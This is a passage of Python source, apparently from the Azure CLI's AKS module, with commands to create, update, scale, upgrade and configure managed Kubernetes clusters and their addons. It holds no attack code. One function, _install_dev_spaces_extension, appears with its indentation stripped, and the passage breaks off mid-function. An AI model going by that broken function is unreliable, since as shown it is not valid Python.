            pod_cidr=pod_cidr,
            service_cidr=service_cidr,
            dns_service_ip=dns_service_ip,
            docker_bridge_cidr=docker_bridge_address,
            network_policy=network_policy,
            load_balancer_sku=load_balancer_sku.lower(),
            load_balancer_profile=load_balancer_profile,
            outbound_type=outbound_type
        )
    else:
        if load_balancer_sku.lower() == "standard" or load_balancer_profile:
            network_profile = ContainerServiceNetworkProfile(
                network_plugin="kubenet",
                load_balancer_sku=load_balancer_sku.lower(),
                load_balancer_profile=load_balancer_profile,
                outbound_type=outbound_type,
            )
        if load_balancer_sku.lower() == "basic":
            network_profile = ContainerServiceNetworkProfile(
                load_balancer_sku=load_balancer_sku.lower(),
            )
    addon_profiles = _handle_addons_args(
        cmd,
        enable_addons,
        subscription_id,
        resource_group_name,
        {},
        workspace_resource_id,
        aci_subnet_name,
        vnet_subnet_id
    )
    monitoring = False
    if 'omsagent' in addon_profiles:
        monitoring = True
        _ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
    # --- AAD profile (managed AAD vs. legacy client/server apps) ---
    aad_profile = None
    if enable_aad:
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            raise CLIError('"--enable-aad" cannot be used together with '
                           '"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
        aad_profile = ManagedClusterAADProfile(
            managed=True,
            admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
            tenant_id=aad_tenant_id
        )
    else:
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
            if aad_tenant_id is None:
                profile = Profile(cli_ctx=cmd.cli_ctx)
                _, _, aad_tenant_id = profile.get_login_credentials()
            aad_profile = ManagedClusterAADProfile(
                client_app_id=aad_client_app_id,
                server_app_id=aad_server_app_id,
                server_app_secret=aad_server_app_secret,
                tenant_id=aad_tenant_id
            )
    api_server_access_profile = None
    if enable_private_cluster and load_balancer_sku.lower() != "standard":
        raise CLIError("Please use standard load balancer for private cluster")
    if api_server_authorized_ip_ranges or enable_private_cluster:
        api_server_access_profile = _populate_api_server_access_profile(
            api_server_authorized_ip_ranges,
            enable_private_cluster=enable_private_cluster
        )
    # Check that both --disable-rbac and --enable-rbac weren't provided
    if all([disable_rbac, enable_rbac]):
        raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
    identity = None
    if enable_managed_identity:
        identity = ManagedClusterIdentity(
            type="SystemAssigned"
        )
    mc = ManagedCluster(
        location=location,
        tags=tags,
        dns_prefix=dns_name_prefix,
        kubernetes_version=kubernetes_version,
        enable_rbac=not disable_rbac,
        agent_pool_profiles=[agent_pool_profile],
        linux_profile=linux_profile,
        windows_profile=windows_profile,
        service_principal_profile=service_principal_profile,
        network_profile=network_profile,
        addon_profiles=addon_profiles,
        aad_profile=aad_profile,
        auto_scaler_profile=cluster_autoscaler_profile,
        api_server_access_profile=api_server_access_profile,
        identity=identity,
        disk_encryption_set_id=node_osdisk_diskencryptionset_id
    )
    if uptime_sla:
        mc.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )
    # Add AAD session key to header.
    # If principal_obj is None, we will not add this header, this can happen
    # when the cluster enables managed identity. In this case, the header is useless
    # and that's OK to not add this header
    custom_headers = None
    if principal_obj:
        custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            need_pull_for_result = monitoring or (enable_managed_identity and attach_acr)
            if need_pull_for_result:
                # adding a wait here since we rely on the result for role assignment
                result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
                    resource_group_name=resource_group_name,
                    resource_name=name,
                    parameters=mc))
            else:
                result = sdk_no_wait(no_wait,
                                     client.create_or_update,
                                     resource_group_name=resource_group_name,
                                     resource_name=name,
                                     parameters=mc,
                                     custom_headers=custom_headers)
            if monitoring:
                cloud_name = cmd.cli_ctx.cloud.name
                # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
                # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
                if cloud_name.lower() == 'azurecloud':
                    from msrestazure.tools import resource_id
                    cluster_resource_id = resource_id(
                        subscription=subscription_id,
                        resource_group=resource_group_name,
                        namespace='Microsoft.ContainerService', type='managedClusters',
                        name=name
                    )
                    _add_monitoring_role_assignment(result, cluster_resource_id, cmd)
            if enable_managed_identity and attach_acr:
                if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
                    logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
                                   'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
                                   'in MC_ resource group to give it permission to pull from ACR.')
                else:
                    kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
                    _ensure_aks_acr(cmd.cli_ctx,
                                    client_id=kubelet_identity_client_id,
                                    acr_name_or_id=attach_acr,
                                    subscription_id=subscription_id)
            return result
        except CloudError as ex:
            retry_exception = ex
            if 'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable the given addons on a managed cluster and push the updated model."""
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name,
                              addons, enable=False, no_wait=no_wait)
    # send the managed cluster representation to update the addon profiles
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
                      subnet_name=None, no_wait=False):
    """Enable the given addons on a managed cluster and push the updated model.

    When the monitoring (omsagent) addon is enabled, waits for the operation to
    finish and then assigns the 'Monitoring Metrics Publisher' role (public
    Azure cloud only); otherwise honors --no-wait.
    """
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
                              workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
    if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
        _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
        cloud_name = cmd.cli_ctx.cloud.name
        # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
        if cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(result, cluster_resource_id, cmd)
    else:
        result = sdk_no_wait(no_wait, client.create_or_update,
                             resource_group_name, name, instance)
    return result
def aks_get_versions(cmd, client, location):
    """List the orchestrator versions available for managed clusters in *location*."""
    orchestrators = client.list_orchestrators(location, resource_type='managedClusters')
    return orchestrators
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
                        path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
                        overwrite_existing=False, context_name=None):
    """Fetch cluster credentials and merge (or print) the resulting kubeconfig.

    :raises CLIError: when no credentials are returned or the payload is malformed
    """
    if admin:
        credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
    else:
        credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
    if not credentialResults:
        raise CLIError("No Kubernetes credentials found.")
    try:
        kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
        _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")
# Maps the addon names accepted on the CLI to the profile keys used by the AKS API.
ADDONS = {
    'http_application_routing': 'httpApplicationRouting',
    'monitoring': 'omsagent',
    'virtual-node': 'aciConnector',
    'kube-dashboard': 'kubeDashboard',
    'azure-policy': 'azurepolicy'
}
def aks_list(cmd, client, resource_group_name=None):
    """List managed clusters, optionally scoped to a single resource group."""
    clusters = client.list_by_resource_group(resource_group_name) if resource_group_name else client.list()
    return _remove_nulls(list(clusters))
def aks_show(cmd, client, resource_group_name, name):
    """Return a single managed cluster with null-valued fields stripped."""
    managed_cluster = client.get(resource_group_name, name)
    return _remove_nulls([managed_cluster])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
                           reset_service_principal=False,
                           reset_aad=False,
                           service_principal=None,
                           client_secret=None,
                           aad_server_app_id=None,
                           aad_server_app_secret=None,
                           aad_client_app_id=None,
                           aad_tenant_id=None,
                           no_wait=False):
    """Reset either the cluster's service principal or its AAD profile.

    Exactly one of ``reset_service_principal`` / ``reset_aad`` must be requested.
    """
    if bool(reset_service_principal) == bool(reset_aad):
        raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
    if reset_service_principal:
        # Service-principal reset needs both the app id and its secret.
        if any(value is None for value in (service_principal, client_secret)):
            raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
        return sdk_no_wait(no_wait,
                           client.reset_service_principal_profile,
                           resource_group_name,
                           name, service_principal, client_secret)
    # AAD reset: the three app parameters are mandatory; the tenant id is optional.
    if not (aad_client_app_id and aad_server_app_id and aad_server_app_secret):
        raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
                       '--aad-server-app-secret SECRET [--aad-tenant-id ID]')
    parameters = {
        'clientAppID': aad_client_app_id,
        'serverAppID': aad_server_app_id,
        'serverAppSecret': aad_server_app_secret,
        'tenantID': aad_tenant_id
    }
    return sdk_no_wait(no_wait,
                       client.reset_aad_profile,
                       resource_group_name,
                       name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
    """Scale one node pool of a managed cluster to *node_count* nodes."""
    instance = client.get(resource_group_name, name)
    pool_total = len(instance.agent_pool_profiles)
    if pool_total > 1 and nodepool_name == "":
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')
    for profile in instance.agent_pool_profiles:
        # Match by explicit name, or implicitly when the cluster has exactly one pool.
        matched = profile.name == nodepool_name or (nodepool_name == "" and pool_total == 1)
        if not matched:
            continue
        if profile.enable_auto_scaling:
            raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
        profile.count = int(node_count)  # pylint: disable=no-member
        # null out the SP and AAD profile because otherwise validation complains
        instance.service_principal_profile = None
        instance.aad_profile = None
        return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
    raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
               enable_cluster_autoscaler=False,
               disable_cluster_autoscaler=False,
               update_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               min_count=None, max_count=None,
               uptime_sla=False,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               attach_acr=None,
               detach_acr=None,
               api_server_authorized_ip_ranges=None,
               enable_aad=False,
               aad_tenant_id=None,
               aad_admin_group_object_ids=None,
               enable_ahub=False,
               disable_ahub=False,
               no_wait=False):
    """Update settings of an existing managed cluster.

    Mutates the fetched ManagedCluster in place (autoscaler, SKU, load balancer,
    API-server access, AAD, AHUB) and submits one create_or_update call at the end.
    ACR attach/detach is performed immediately via role assignments, not via the
    cluster PUT. Raises CLIError when no update flag is given or flags conflict.
    """
    # The three autoscaler booleans sum to the number of autoscaler actions requested;
    # at most one is meaningful (checked below together with the other flags).
    update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
    update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
                                                         load_balancer_outbound_ips,
                                                         load_balancer_outbound_ip_prefixes,
                                                         load_balancer_outbound_ports,
                                                         load_balancer_idle_timeout)
    update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
    # pylint: disable=too-many-boolean-expressions
    # Reject the call when nothing at all was requested.
    if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
            not update_lb_profile and
            not attach_acr and
            not detach_acr and
            not uptime_sla and
            api_server_authorized_ip_ranges is None and
            not enable_aad and
            not update_aad_profile and
            not enable_ahub and
            not disable_ahub):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--cluster-autoscaler-profile" or '
                       '"--load-balancer-managed-outbound-ip-count" or'
                       '"--load-balancer-outbound-ips" or '
                       '"--load-balancer-outbound-ip-prefixes" or'
                       '"--load-balancer-outbound-ports" or'
                       '"--load-balancer-idle-timeout" or'
                       '"--attach-acr" or "--detach-acr" or'
                       '"--uptime-sla" or'
                       '"--api-server-authorized-ip-ranges" or '
                       '"--enable-aad" or '
                       '"--aad-tenant-id" or '
                       '"--aad-admin-group-object-ids" or '
                       '"--enable-ahub" or '
                       '"--disable-ahub"')
    instance = client.get(resource_group_name, name)
    # For multi-agent pool, use the az aks nodepool command
    if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
                       'to update per node pool auto scaler settings')
    _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
                                       update_cluster_autoscaler)
    # NOTE: the autoscaler branches below only touch agent_pool_profiles[0] —
    # multi-pool clusters were rejected above.
    if enable_cluster_autoscaler:
        if instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)
        instance.agent_pool_profiles[0].enable_auto_scaling = True
    if update_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)
    if disable_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning('Cluster autoscaler is already disabled for this node pool.')
            return None
        instance.agent_pool_profiles[0].enable_auto_scaling = False
        instance.agent_pool_profiles[0].min_count = None
        instance.agent_pool_profiles[0].max_count = None
    # if intention is to clear autoscaler profile
    if cluster_autoscaler_profile == {}:
        instance.auto_scaler_profile = {}
    # else profile is provided, update instance profile if it exists
    elif cluster_autoscaler_profile:
        instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
                                                    dict((key.replace("-", "_"), value)
                                                         for (key, value) in cluster_autoscaler_profile.items())) \
            if instance.auto_scaler_profile else cluster_autoscaler_profile
    subscription_id = get_subscription_id(cmd.cli_ctx)
    client_id = ""
    # Resolve the principal used for ACR role assignments: the kubelet MSI for
    # system-assigned-identity clusters, otherwise the cluster service principal.
    if instance.identity is not None and instance.identity.type == "SystemAssigned":
        if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
            raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
                           'Please do not set --attach-acr or --detach-acr. '
                           'You can manually grant or revoke permission to the identity named '
                           '<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
        client_id = instance.identity_profile["kubeletidentity"].client_id
    else:
        client_id = instance.service_principal_profile.client_id
    if not client_id:
        raise CLIError('Cannot get the AKS cluster\'s service principal.')
    if attach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=attach_acr,
                        subscription_id=subscription_id)
    if detach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=detach_acr,
                        subscription_id=subscription_id,
                        detach=True)
    if uptime_sla:
        instance.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )
    if update_lb_profile:
        instance.network_profile.load_balancer_profile = update_load_balancer_profile(
            load_balancer_managed_outbound_ip_count,
            load_balancer_outbound_ips,
            load_balancer_outbound_ip_prefixes,
            load_balancer_outbound_ports,
            load_balancer_idle_timeout,
            instance.network_profile.load_balancer_profile)
    # empty string is valid as it disables ip whitelisting
    if api_server_authorized_ip_ranges is not None:
        instance.api_server_access_profile = \
            _populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
    if enable_aad:
        if instance.aad_profile is not None and instance.aad_profile.managed:
            raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
        instance.aad_profile = ManagedClusterAADProfile(
            managed=True
        )
    if update_aad_profile:
        if instance.aad_profile is None or not instance.aad_profile.managed:
            raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
                           ' if managed AAD is not enabled')
        if aad_tenant_id is not None:
            instance.aad_profile.tenant_id = aad_tenant_id
        if aad_admin_group_object_ids is not None:
            instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
    if enable_ahub and disable_ahub:
        raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
    if enable_ahub:
        instance.windows_profile.license_type = 'Windows_Server'
    if disable_ahub:
        instance.windows_profile.license_type = 'None'
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
                client,
                resource_group_name, name,
                kubernetes_version='',
                control_plane_only=False,
                node_image_only=False,
                no_wait=False,
                yes=False):
    """Upgrade a managed cluster's Kubernetes version, or only its node images.

    Prompts for confirmation before any change unless ``yes`` is set. With
    ``node_image_only``, upgrades node images of every pool one at a time
    (VMSS clusters only) and returns the refreshed cluster. Otherwise sets the
    control-plane version and, depending on ``control_plane_only`` and cluster
    capabilities, also the per-pool orchestrator versions, then submits one
    create_or_update.
    """
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None
    instance = client.get(resource_group_name, name)
    # Detect legacy AvailabilitySet-based pools; they constrain what can be upgraded.
    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break
    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')
    if node_image_only:
        msg = "This node image upgrade operation will run across every node pool in the cluster" \
              "and might take a while, do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        for agent_pool_profile in instance.agent_pool_profiles:
            if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                               'can only be applied on VirtualMachineScaleSets cluster.')
            _upgrade_single_nodepool_image_version(True, client, resource_group_name, name, agent_pool_profile.name)
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]
    # Same-version upgrades are allowed: they are a no-op on healthy clusters but
    # can recover a cluster stuck in a Failed provisioning state.
    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)
    upgrade_all = False
    instance.kubernetes_version = kubernetes_version
    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version
    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
    # Thin wrapper: trigger a node-image-only upgrade for one node pool of the cluster.
    return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
# Name and custom-command module of the optional Azure Dev Spaces CLI extension.
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
                       endpoint_type='Public', prompt=False):
    """
    Use Azure Dev Spaces with a managed Kubernetes cluster.
    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param update: Update to the latest Azure Dev Spaces client components.
    :type update: bool
    :param space_name: Name of the new or existing dev space to select. Defaults to an \
    interactive selection experience.
    :type space_name: String
    :param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
    See https://aka.ms/azds-networking for more information.
    :type endpoint_type: String
    :param prompt: Do not prompt for confirmation. Requires --space.
    :type prompt: bool
    """
    # Guard clause: bail out silently if the dev-spaces extension is unavailable.
    if not _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
        return
    azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
    try:
        azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
    except TypeError:
        # An old extension exposes a different signature for ads_use_dev_spaces.
        raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
    except AttributeError as ae:
        raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
    """
    Remove Azure Dev Spaces from a managed Kubernetes cluster.
    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param prompt: Do not prompt for confirmation.
    :type prompt: bool
    """
    # Guard clause: nothing to do when the dev-spaces extension is unavailable.
    if not _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
        return
    azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
    try:
        azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
    except AttributeError as ae:
        raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
    # Rotate all cluster certificates; long-running, hence no-wait by default.
    return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
                   subnet_name=None, no_wait=False):
    """Enable or disable the given comma-separated addons on *instance* and return it.

    Mutates ``instance.addon_profiles`` in place; does NOT submit the update —
    the caller is expected to PUT the returned ManagedCluster. Raises CLIError
    for unknown addon names, for enabling an already-enabled monitoring /
    virtual-node addon, and for disabling an addon that is not installed.
    """
    # parse the comma-separated addons argument
    addon_args = addons.split(',')
    addon_profiles = instance.addon_profiles or {}
    os_type = 'Linux'
    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == 'aciConnector':
            # only linux is supported for now, in the future this will be a user flag
            addon += os_type
        # addon name is case insensitive
        addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == 'omsagent':
                if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
                                   'before enabling it again.')
                if not workspace_resource_id:
                    # Fall back to the subscription's default Log Analytics workspace.
                    workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                        cmd,
                        subscription_id,
                        resource_group_name)
                # Normalize to the canonical "/subscriptions/..." form without a trailing slash.
                workspace_resource_id = workspace_resource_id.strip()
                if not workspace_resource_id.startswith('/'):
                    workspace_resource_id = '/' + workspace_resource_id
                if workspace_resource_id.endswith('/'):
                    workspace_resource_id = workspace_resource_id.rstrip('/')
                addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
            elif addon.lower() == ('aciConnector' + os_type).lower():
                if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError('The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {'SubnetName': subnet_name}
            addon_profiles[addon] = addon_profile
        else:
            if addon not in addon_profiles:
                # kube-dashboard may be absent on new clusters; treat disable as idempotent.
                if addon == 'kubeDashboard':
                    addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
                else:
                    raise CLIError("The addon {} is not installed.".format(addon))
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable
    instance.addon_profiles = addon_profiles
    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None
    return instance
def _get_azext_module(extension_name, module_name):
    """Import and return *module_name* from an installed CLI extension."""
    try:
        # Adding the installed extension in the path
        from azure.cli.core.extension.operations import add_extension_to_path
        add_extension_to_path(extension_name)
        # Import the extension module
        from importlib import import_module
        return import_module(module_name)
    except ImportError as ie:
        raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
                        workspace_resource_id=None, aci_subnet_name=None, vnet_subnet_id=None):
    """Translate the ``--enable-addons`` argument into addon-profile entries.

    Consumes recognized names from the comma-separated *addons_str*, filling
    *addon_profiles* (a dict keyed by server-side addon names); any leftover
    name raises CLIError. Returns the populated dict.
    """
    if not addon_profiles:
        addon_profiles = {}
    addons = addons_str.split(',') if addons_str else []
    if 'http_application_routing' in addons:
        addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('http_application_routing')
    if 'kube-dashboard' in addons:
        addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('kube-dashboard')
    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)
        # Normalize the workspace ID to "/..." with no trailing slash.
        workspace_resource_id = workspace_resource_id.strip()
        if not workspace_resource_id.startswith('/'):
            workspace_resource_id = '/' + workspace_resource_id
        if workspace_resource_id.endswith('/'):
            workspace_resource_id = workspace_resource_id.rstrip('/')
        addon_profiles['omsagent'] = ManagedClusterAddonProfile(
            enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
        addons.remove('monitoring')
    # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
    elif workspace_resource_id:
        raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
    if 'azure-policy' in addons:
        addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('azure-policy')
    if 'virtual-node' in addons:
        if not aci_subnet_name or not vnet_subnet_id:
            raise CLIError('"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
        # TODO: how about aciConnectorwindows, what is its addon name?
        addon_profiles['aciConnectorLinux'] = ManagedClusterAddonProfile(
            enabled=True,
            config={'SubnetName': aci_subnet_name}
        )
        addons.remove('virtual-node')
    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
    """Update and reload an installed CLI extension.

    Returns True on success (or on a logged CLIError), False when the extension
    is not installed or its module cannot be loaded.
    """
    from azure.cli.core.extension import ExtensionNotInstalledException
    try:
        from azure.cli.core.extension import operations
        operations.update_extension(cmd=cmd, extension_name=extension_name)
        operations.reload_extension(extension_name=extension_name)
    except CLIError as err:
        # Update failures are informational only; the existing install keeps working.
        logger.info(err)
    except ExtensionNotInstalledException as err:
        logger.debug(err)
        return False
    except ModuleNotFoundError as err:
